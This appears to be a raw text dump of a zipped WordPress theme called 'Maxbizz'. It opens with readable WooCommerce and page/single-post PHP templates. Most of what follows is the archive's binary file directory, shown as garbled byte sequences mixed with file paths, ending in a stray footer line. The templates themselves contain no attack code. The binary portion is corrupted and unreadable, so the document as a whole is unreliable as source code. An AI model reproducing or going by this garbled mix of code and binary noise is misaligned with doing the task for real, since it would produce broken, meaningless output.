			<?php echo wc_get_rating_html( $product->get_average_rating() ); // PHPCS:Ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
		<?php endif; ?>

		<span class="price"><?php echo $product->get_price_html(); // PHPCS:Ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?></span>
	</div>
	<?php do_action( 'woocommerce_widget_product_item_end', $args ); ?>
</li>
PK�8FZ�,��55"woocommerce/product-searchform.phpnu�[���<?php
/**
 * The template for displaying product search form
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/product-searchform.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce/Templates
 * @version 6.3.0
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

?>
<form role="search" method="get" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>">	
	<input type="search" id="woocommerce-product-search-field-<?php echo isset( $index ) ? absint( $index ) : 0; ?>" class="search-field" placeholder="<?php echo esc_attr__( 'Search products&hellip;', 'maxbizz' ); ?>" value="<?php echo get_search_query(); ?>" name="s" />
	<button class="search-submit" type="submit" value="<?php echo esc_attr_x( 'Search', 'submit button', 'maxbizz' ); ?>"><i class="ot-flaticon-search-1"></i></button>
	<input type="hidden" name="post_type" value="product" />
</form>
PK�8FZN�RP
P
woocommerce/archive-product.phpnu�[���<?php
/**
 * The Template for displaying product archives, including the main shop page which is a post type archive
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/archive-product.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce/Templates
 * @version 6.4.0
 */

defined( 'ABSPATH' ) || exit;

get_header( 'shop' );
?>
<div class="content-product-wrapper">
	<div class="container">
		<div class="row">
			<?php
			/**
			 * Hook: woocommerce_before_main_content.
			 *
			 * @hooked woocommerce_output_content_wrapper - 10 (outputs opening divs for the content)
			 * @hooked woocommerce_breadcrumb - 20
			 * @hooked WC_Structured_Data::generate_website_data() - 30
			 */
			do_action( 'woocommerce_before_main_content' );
			
			if ( woocommerce_product_loop() ) {

				/**
				 * Hook: woocommerce_before_shop_loop.
				 *
				 * @hooked woocommerce_output_all_notices - 10
				 * @hooked woocommerce_result_count - 20
				 * @hooked woocommerce_catalog_ordering - 30
				 */
				do_action( 'woocommerce_before_shop_loop' );

				woocommerce_product_loop_start();

				if ( wc_get_loop_prop( 'total' ) ) {
					while ( have_posts() ) {
						the_post();

						/**
						 * Hook: woocommerce_shop_loop.
						 */
						do_action( 'woocommerce_shop_loop' );

						wc_get_template_part( 'content', 'product' );
					}
				}

				woocommerce_product_loop_end();

				/**
				 * Hook: woocommerce_after_shop_loop.
				 *
				 * @hooked woocommerce_pagination - 10
				 */
				do_action( 'woocommerce_after_shop_loop' );
			} else {
				/**
				 * Hook: woocommerce_no_products_found.
				 *
				 * @hooked wc_no_products_found - 10
				 */
				do_action( 'woocommerce_no_products_found' );
			}

			/**
			 * Hook: woocommerce_after_main_content.
			 *
			 * @hooked woocommerce_output_content_wrapper_end - 10 (outputs closing divs for the content)
			 */
			do_action( 'woocommerce_after_main_content' );

			/**
			 * Hook: woocommerce_sidebar.
			 *
			 * @hooked woocommerce_get_sidebar - 10
			 */
			do_action( 'woocommerce_sidebar' ); 
			?>
		</div>
	</div>
</div>
<?php
get_footer( 'shop' );
PK�8FZ�Bw��page.phpnu�[���<?php
/**
 * The template for displaying all pages
 *
 * This is the template that displays all pages by default.
 * Please note that this is the WordPress construct of pages
 * and that other 'pages' on your WordPress site may use a
 * different template.
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header();
?>

    <?php if( maxbizz_get_layout() == 'full-content' ) :

        while ( have_posts() ) : the_post();

        the_content();

    endwhile; else : ?>
    
<div class="entry-content">
    <div class="container">
        <div class="row">
        <div id="primary" class="content-area <?php maxbizz_content_columns(); ?>">
            <main id="main" class="site-main">

            <?php
            while ( have_posts() ) :
                the_post();

                get_template_part( 'template-parts/content', 'page' );

                // If comments are open or we have at least one comment, load up the comment template.
                if ( comments_open() || get_comments_number() ) :
                    comments_template();
                endif;

            endwhile; // End of the loop.
            ?>

            </main><!-- #main -->
        </div><!-- #primary -->

        <?php get_sidebar(); ?>
        </div>
    </div>
</div>

    <?php endif; ?>

<?php
get_footer();PK�8FZT~Ҋ
single.phpnu�[���<?php
/**
 * The template for displaying all single posts
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#single-post
 *
 * @package Maxbizz
 */

get_header();

if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'single' ) ) { ?>
	<div class="entry-content">
		<div class="container">
			<div class="row">
				<div id="primary" class="content-area <?php maxbizz_content_columns(); ?>">
					<main id="main" class="site-main">
						
					<?php
					while ( have_posts() ) :
						the_post();

						get_template_part( 'template-parts/content', 'single' );

						// If comments are open or we have at least one comment, load up the comment template.
						if ( comments_open() || get_comments_number() ) :
							comments_template();
						endif;

					endwhile; // End of the loop.
					?>

					</main><!-- #main -->
				</div><!-- #primary -->
				
				<?php get_sidebar(); ?>
			</div>
		</div>	
	</div>
<?php }

get_footer();
PK�8FZG����T�Tinc/frontend/template-tags.phpnu�[���PK�8FZ�	*3���Tinc/frontend/builder.phpnu�[���PK�8FZ���qq&jinc/frontend/header/header-default.phpnu�[���PK�8FZ��;mm%�oinc/frontend/header/header-mobile.phpnu�[���PK�8FZH�]6++&�tinc/frontend/widgets/author-widget.phpnu�[���PK�8FZ�>���%�inc/frontend/widgets/recent-posts.phpnu�[���PK�8FZݒDz#%#%(C�inc/frontend/page-header/breadcrumbs.phpnu�[���PK�8FZ=�?7--(��inc/frontend/page-header/page-header.phpnu�[���PK�8FZ���!�!#C�inc/frontend/template-functions.phpnu�[���PK�8FZ]�<<Winc/frontend/preloader.phpnu�[���PK�8FZqڋ  #�'inc/backend/elementor/elementor.phpnu�[���PK�8FZ�FE�Y	Y	 BHinc/backend/elementor/column.phpnu�[���PK�8FZ�"�`""/�Qinc/backend/elementor/widgets/contact-form7.phpnu�[���PK�8FZt=��==/Ptinc/backend/elementor/widgets/pricing-table.phpnu�[���PK�8FZE_�:E:E/űinc/backend/elementor/widgets/post-carousel.phpnu�[���PK�8FZjA_8�;�;,^�inc/backend/elementor/widgets/icon-box-2.phpnu�[���PK�8FZ>/M���+W3inc/backend/elementor/widgets/countdown.phpnu�[���PK�8FZ)�2��8�82dRinc/backend/elementor/widgets/features-service.phpnu�[���PK�8FZj����,p�inc/backend/elementor/widgets/accordions.phpnu�[���PK�8FZ�=����-��inc/backend/elementor/widgets/message-box.phpnu�[���PK�8FZ�j�bc(c(*��inc/backend/elementor/widgets/flip-box.phpnu�[���PK�8FZ)1��>�>(��inc/backend/elementor/widgets/team-1.phpnu�[���PK�8FZ�����9�94�-inc/backend/elementor/widgets/portfolio-carousel.phpnu�[���PK�8FZ����r/r//�ginc/backend/elementor/widgets/icon-box-grid.phpnu�[���PK�8FZM$�}�U�U/ϗinc/backend/elementor/widgets/team-carousel.phpnu�[���PK�8FZ����))*�inc/backend/elementor/widgets/switcher.phpnu�[���PK�8FZ/sx x .�inc/backend/elementor/widgets/video-button.phpnu�[���PK�8FZ=�%iCiC9x#inc/backend/elementor/widgets/testimonials-carousel-1.phpnu�[���PK�8FZ�o4�2�2.Jginc/backend/elementor/widgets/client-logos.phpnu�[���PK�8FZ�^�-//(Z�inc/backend/elementor/widgets/button.phpnu�[���PK�8FZP_�~.~.+�inc/backend/elementor/widgets/image-box.phpnu�[���PK�8FZ��5e��,��inc/backend/elementor/widgets/tab-titles.phpnu�[���PK�8FZ�RM��)��inc/backend/elementor/widgets/counter.phpnu�[���PK�8FZ�W�ww)�inc/backend/elementor/widgets/widgets.phpnu�[���PK�8FZ���7�7(�$inc/backend/elementor/widgets/team-2.phpnu�[���PK�8FZ�5F��@�@9�\inc/backend/elementor/widgets/testimonials-carousel-2.phpnu�[���PK�8FZ�;�M3e3e2�inc/backend/elementor/widgets/portfolio-filter.phpnu�[���PK�8FZx�@�v&v&/�inc/backend/elementor/widgets/progress-bars.phpnu�[���PK�8FZI���::3n*inc/backend/elementor/widgets/header/side-panel.phpnu�[���PK�8FZ���yy0:inc/backend/elementor/widgets/header/widgets.phpnu�[���PK�8FZ���C��-�<inc/backend/elementor/widgets/header/cart.phpnu�[���PK�8FZR�~4)Linc/backend/elementor/widgets/header/menu-mobile.phpnu�[���PK�8FZ<�ܝ��/�binc/backend/elementor/widgets/header/search.phpnu�[���PK�8FZ�A�H�!�!-�xinc/backend/elementor/widgets/header/menu.phpnu�[���PK�8FZ
�N��
�
-�inc/backend/elementor/widgets/header/logo.phpnu�[���PK�8FZ)�����)ƨinc/backend/elementor/widgets/heading.phpnu�[���PK�8FZXM�
 
 &�inc/backend/elementor/widgets/tabs.phpnu�[���PK�8FZAˣ'J'J4o�inc/backend/elementor/widgets/image-box-carousel.phpnu�[���PK�8FZ�����.�1inc/backend/elementor/widgets/counter-icon.phpnu�[���PK�8FZ�|�(II,,Minc/backend/elementor/widgets/icon-box-1.phpnu�[���PK�8FZni�@�@(��inc/backend/elementor/widgets/team-3.phpnu�[���PK�8FZ����inc/backend/admin-functions.phpnu�[���PK�8FZ"�y����inc/backend/images/left.pngnu�[���PK�8FZ����B�inc/backend/images/full.pngnu�[���PK�8FZ��"����inc/backend/images/right.pngnu�[���PK�8FZZ��U+U+��inc/backend/color.phpnu�[���PK�8FZ",�����%_inc/backend/customizer/customizer.phpnu�[���PK�8FZt���%b�inc/backend/data/business/widgets.wienu�[���PK�8FZ�:a+�
�
(^�inc/backend/data/business/customizer.datnu�[���PK�8FZ���$?
?
#��inc/backend/data/business/home3.jpgnu�[���PK�8FZ�+��6+6+*�	inc/backend/data/business/demo-content.xmlnu�[���PK�8FZ|��p�p�%��(inc/backend/data/business/sliders.zipnu�[���PK�8FZwQ3��!l�.inc/backend/data/main/widgets.wienu�[���PK�8FZUνܖ���.inc/backend/data/main/home1.jpgnu�[���PK�8FZ�s���&h�/inc/backend/data/main/demo-content.xmlnu�[���PK�8FZQ����$��Ninc/backend/data/main/customizer.datnu�[���PK�8FZș*xx!��Ninc/backend/data/main/sliders.zipnu�[���PK�8FZ���"��$a�Tinc/backend/data/corporate/home4.jpgnu�[���PK�8FZw&e�l� l� +��Uinc/backend/data/corporate/demo-content.xmlnu�[���PK�8FZ�H�	�
�
)o�vinc/backend/data/corporate/customizer.datnu�[���PK�8FZ��v���&��vinc/backend/data/corporate/widgets.wienu�[���PK�8FZ�&�?0)!0)!)��vinc/backend/data/finance/demo-content.xmlnu�[���PK�8FZǞ��:�:�"&�inc/backend/data/finance/home5.jpgnu�[���PK�8FZ(ә%�
�
'���inc/backend/data/finance/customizer.datnu�[���PK�8FZ故��$��inc/backend/data/finance/widgets.wienu�[���PK�8FZ�:���,|�inc/backend/data/consulting/demo-content.xmlnu�[���PK�8FZl�B�{p{p'㜸inc/backend/data/consulting/sliders.zipnu�[���PK�8FZ�J����%�
�inc/backend/data/consulting/home2.jpgnu�[���PK�8FZ#oة�'��inc/backend/data/consulting/widgets.wienu�[���PK�8FZMwJ��
�
*�
�inc/backend/data/consulting/customizer.datnu�[���PK�8FZ$�xff'�inc/backend/plugin-requires.phpnu�[���PK�8FZۂ�+__�.�inc/backend/js/admin-script.jsnu�[���PK�8FZ6q�s��%�3�inc/backend/js/upload_media_widget.jsnu�[���PK�8FZ��u����7�inc/backend/importer.phpnu�[���PK�8FZ�(Y��"�"�G�inc/backend/meta-boxes.phpnu�[���PK�8FZ.r���j�inc/backend/css/admin-style.cssnu�[���PK�8FZ|K��(Al�inc/libs/class-tgm-plugin-activation.phpnu�[���PK�8FZ�?�)�)ii�inc/woocommerce/woocommerce.phpnu�[���PK�8FZ~FXi"i"���screenshot.jpgnu�[���PK�8FZ�� �DD
O��readme.txtnu�[���PK�8FZo(i�i�ͻ�images/bg-404.jpgnu�[���PK�8FZ�QU�j�jwh�images/avatar-1.pngnu�[���PK�8FZz��w�w�R��images/c-member-2.jpgnu�[���PK�8FZS2b����images/close.pngnu�[���PK�8FZ�$��images/logo-white.svgnu�[���PK�8FZ*&�}q��images/logo.svgnu�[���PK�8FZcb_š����images/image-box-1.jpgnu�[���PK�8FZ����
���footer.phpnu�[���PK�8FZމJ����	���style.cssnu�[���PK�8FZ���R��	�j�index.phpnu�[���PK�8FZZ�c����[p�languages/maxbizz.potnu�[���PK�8FZ6����]�page-templates/shop-page.phpnu�[���PK�8FZ�V�x!��template-parts/content-search.phpnu�[���PK�8FZw�%����template-parts/content-none.phpnu�[���PK�8FZҕ��";�template-parts/content-project.phpnu�[���PK�8FZ��}���A�template-parts/content-page.phpnu�[���PK�8FZp�EjSS!�!�template-parts/content-header.phpnu�[���PK�8FZ8��u��+-%�template-parts/content-project-carousel.phpnu�[���PK�8FZ�s�M��!8+�template-parts/content-single.phpnu�[���PK�8FZ��
���]D�template-parts/content.phpnu�[���PK�8FZ��6��(�X�template-parts/content-project-metro.phpnu�[���PK�8FZ^�w��*�a�template-parts/content-project-masonry.phpnu�[���PK�8FZ�񷼸�wh�fonts/lg.eotnu�[���PK�8FZFQ�e�"�"kx�fonts/lg.svgnu�[���PK�8FZM̶�6�6l��fonts/Flaticon.woff2nu�[���PK�8FZ�`��d�dx��fonts/Flaticon.ttfnu�[���PK�8FZ���tt
f7�fonts/lg.woffnu�[���PK�8FZ��$@$@G�fonts/Flaticon.woffnu�[���PK�8FZ��U((~��fonts/lg.ttfnu�[���PK�8FZ[zVZ^e^e��fonts/Flaticon.eotnu�[���PK�8FZ
�+n�����fonts/Flaticon.svgnu�[���PK�8FZݹZmm
���search.phpnu�[���PK�8FZ$ �O

���archive-ot_portfolio.phpnu�[���PK�8FZM2������single-ot_portfolio.phpnu�[���PK�8FZ�x�9""
��functions.phpnu�[���PK�8FZ����	�	"�js/myloadmore.jsnu�[���PK�8FZH
���*�*',�js/elementor.min.jsnu�[���PK�8FZ� ��TW�js/elementor-header.min.jsnu�[���PK�8FZ�
�LT]�js/myloadmore.min.jsnu�[���PK�8FZ�@N=���b�js/elementor-header.jsnu�[���PK�8FZ+��?$?$xn�js/royal_preloader.min.jsnu�[���PK�8FZTś�<�<���js/owl.carousel.min.jsnu�[���PK�8FZ*������@�js/jquery.isotope.min.jsnu�[���PK�8FZ�qn#n#
J��js/scripts.jsnu�[���PK�8FZot@ll���js/scripts.min.jsnu�[���PK�8FZfѢ�kk��js/easypiechart.min.jsnu�[���PK�8FZ��S�js/jquery.countdown.min.jsnu�[���PK�8FZ�
������js/lightgallery-all.min.jsnu�[���PK�8FZ3��x�x��js/elementor.jsnu�[���PK�8FZu�^�||�U�archive.phpnu�[���PK�8FZۯ��
�
Z�comments.phpnu�[���PK�8FZ���o���e�sidebar.phpnu�[���PK�8FZ�ԛ��g�css/flaticon.cssnu�[���PK�8FZ��J�/�/�{�css/bootstrap.cssnu�[���PK�8FZ��A&�k�kī�css/woocommerce.cssnu�[���PK�8FZ�w��%�%��css/editor-style.cssnu�[���PK�8FZ+�����=�css/royal-preload.cssnu�[���PK�8FZrO�E�d�d�[�css/lightgallery.cssnu�[���PK�8FZ��%xx���css/owl.carousel.min.cssnu�[���PK�8FZj�ơ�
���header.phpnu�[���PK�8FZ*I�+//���404.phpnu�[���PK�8FZ�C'�����rtl.cssnu�[���PK�8FZ�"
��taxonomy-portfolio_cat.phpnu�[���PK�8FZt�}	
�woocommerce/global/sidebar.phpnu�[���PK�8FZ�څ�KK`�woocommerce/single-product.phpnu�[���PK�8FZ�ww�� ��woocommerce/loop/add-to-cart.phpnu�[���PK�8FZ��0
�woocommerce/loop/pagination.phpnu�[���PK�8FZY�����Z%�woocommerce/content-product.phpnu�[���PK�8FZ>�,x��&z.�woocommerce/content-widget-product.phpnu�[���PK�8FZ�,��55"�5�woocommerce/product-searchform.phpnu�[���PK�8FZN�RP
P
;�woocommerce/archive-product.phpnu�[���PK�8FZ�Bw���E�page.phpnu�[���PK�8FZT~Ҋ
�K�single.phpnu�[���PK���<�O�
© 2025 GrazzMean